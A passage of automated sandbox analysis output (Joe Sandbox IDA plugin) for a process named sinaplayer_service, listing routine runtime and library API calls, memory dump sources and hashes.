                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@ExceptionThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: Lu[lpx[l$pScheduler
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,00000000,00000000,?,?,003949B4,00000000,00000000,?,00000000,?,0039400F,?), ref: 00394CBF
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,00000000,00000000,?,?,?,?,003849C2,?,00000000,00000000,00000000,?,6C6C52C0), ref: 00394D4A
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394D5E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,003949B4,00000000,00000000,?,00000000,?,0039400F,?), ref: 00394DDB
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394E86
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00394EC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BA974
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BA994
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAA46
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAAA6
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6C5B9D78,?,?,?,?), ref: 6C5BAAAF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6C5D5128,00000008), ref: 6C5D4FA8
                                                                                                                                                                                                    • _errno.MSVCR120(6C5D5128,00000008), ref: 6C5D4FC0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C5D5128,00000008), ref: 6C5D5118
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?UTF8ToUTF16@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 00385DA8
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,?,00000000,?,00000000,00000000), ref: 00385DD3
                                                                                                                                                                                                    • malloc.MSVCR120 ref: 00385DE6
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00385DF6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00385E10
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@BasicCloseCreateD@2@@std@@@1@@D@std@@F16@base@@FileHandlePiece@StringU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@malloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB), ref: 0037D687
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB), ref: 0037D698
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?,?,8285FFAB), ref: 0037D6F2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,8285FFAB), ref: 0037D702
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,8285FFAB), ref: 0037D70C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@FilePath@base@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP120(?,?,8285FFAB,8285FFAB,?,?,00000000,0039C148,000000FF,?,0039178C,00000000,00000021,00000040,00000001,8285FFAB), ref: 00392579
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120(?,?,00391DBA), ref: 00392596
                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP120(?), ref: 003925CC
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB,00000000,?,00000000,?,?,00000000,0039B459,000000FF,?,003925DF), ref: 00390BED
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??Bid@locale@std@@QAEIXZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C08
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C2E
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ?_Getcat@?$codecvt@DDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,0039B459,?,?,00000000,0039B459), ref: 00390C4F
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,?,?,?,?,00000000,0039B459), ref: 00390C65
                                                                                                                                                                                                      • Part of subcall function 00390BC0: _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 00390C74
                                                                                                                                                                                                      • Part of subcall function 00390BC0: std::_Facet_Register.LIBCPMT ref: 00390C8A
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??1_Lockit@std@@QAE@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C95
                                                                                                                                                                                                    • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP120 ref: 003925E6
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 003925FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_W@std@@@std@@$Init@?$basic_streambuf@_Lockit@std@@$??0_??0bad_cast@std@@??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@_Bid@locale@std@@ExceptionFacet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2308386547-0
                                                                                                                                                                                                    • Opcode ID: 9abd31466f2e8a28473ee3dadb0660377f7806ae31969bc95d82d929a0f93932
                                                                                                                                                                                                    • Instruction ID: 37703a8be9e7c1c1bc6adcb923b37aca61ecbbf69a3d094914f3a6efe6c7eba9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9abd31466f2e8a28473ee3dadb0660377f7806ae31969bc95d82d929a0f93932
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F314176604B44DFCB25CF69D804B9ABBF8FB49710F00462EE856C7B90D776A904CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000002,00000000,?,?,?,6C56BF6E,00000000), ref: 6C56B06A
                                                                                                                                                                                                    • memmove.MSVCR120(00000001,00000002,00000001,00000002,00000000,?,?,?,6C56BF6E,00000000), ref: 6C56B073
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6C56BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6C5A3F50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,6C56BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6C5A3F5A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6C56BF6E,00000000), ref: 6C5A3F66
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4167440682-0
                                                                                                                                                                                                    • Opcode ID: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction ID: 10cbb46466cd47d10733ef28dc0aea40869fb60faacc7c3bbf58fdf36b4107cc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A2137302492969EF7029A7B8C5079ABB989F46318F04456AE8958BE21E378C846C761
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP120(00000000,00000000,?,8285FFAB,?,?,?,0039C148,000000FF,?,0038A47F,?,?,00000000), ref: 0038D8B9
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038D8D6
                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP120(?), ref: 0038D8F4
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP120 ref: 0038D90E
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038D926
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_W@std@@@std@@$Init@?$basic_streambuf@_Lockit@std@@$??0_??0bad_cast@std@@??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@_Bid@locale@std@@ExceptionFacet_Fiopen@std@@Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 728936404-0
                                                                                                                                                                                                    • Opcode ID: 394a41f1880b293beaf7cdeb96ff2f523ccaedc8d15aec006f53db9fc867b1d4
                                                                                                                                                                                                    • Instruction ID: 3ec571e65e8b643225eff221ef4c8574f6da94db33f8d506a5ddeed4fb39f9e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394a41f1880b293beaf7cdeb96ff2f523ccaedc8d15aec006f53db9fc867b1d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8831A076604744DFDB22DF68D844B6ABBF9FB49720F00466EE816C7790DB76A800CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,0038F390,?,000000FF,00000014), ref: 0038EA04
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,0038F370,?,000000FF,00000008), ref: 0038EA2C
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038EA40
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038EA58
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0038EA80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$LeaveObjectRegisterSingleWait$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 751849837-0
                                                                                                                                                                                                    • Opcode ID: 18bad21fdcc8e02e32941647fdb88321a64e0010237ccaf0b23e640b1c4f44f2
                                                                                                                                                                                                    • Instruction ID: f56db85fc2a02350af309f0555ac387e33fb1dc2ca73dfbd0ae77cfc79faf4b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18bad21fdcc8e02e32941647fdb88321a64e0010237ccaf0b23e640b1c4f44f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2021AE72904609EFCB12DFA5DD05BDABBB8FB09720F10426AE921A3690D775A504CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018,8285FFAB,?,?,0039B128,000000FF,?,0038886B,?,00000000,?,?,?,?,?,8285FFAB), ref: 00387E09
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038886B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387E84
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387E99
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387EA2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B), ref: 00387EA7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackTask$??2@??3@Callback@$$Location@tracked_objects@@PostReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2865833006-0
                                                                                                                                                                                                    • Opcode ID: f50d05ea3ab48fa4232954d9546ae7ece6f9a2f1789412d9bbb60b13bc1b7de3
                                                                                                                                                                                                    • Instruction ID: b892e2506186d661ad660baabd237386bee04f1c3d3f2713b93d6a25d0e7f68a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f50d05ea3ab48fa4232954d9546ae7ece6f9a2f1789412d9bbb60b13bc1b7de3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC2192B1C04249AFDF02EFA4CD05BEEBBBDEB05314F204196E814A7281E7759A04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackTask$??2@??3@Callback@$$Location@tracked_objects@@PostReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2865833006-0
                                                                                                                                                                                                    • Opcode ID: 872d002584a1b13b7fff152c123a89c3914299750b41075be98e76047ee6b695
                                                                                                                                                                                                    • Instruction ID: c09eba5ca7db0dfb56f03cf04218c9cf4cd5dde7e3491ae8809b2ae0a6119d96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 872d002584a1b13b7fff152c123a89c3914299750b41075be98e76047ee6b695
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C221A4B1C08249EFDF02DFA4CD45BEEBBBCEB15304F204096E815A7281E7759A04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00392848
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0039285C
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0039286D
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 003928AB
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003928BE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@$ungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3218286629-0
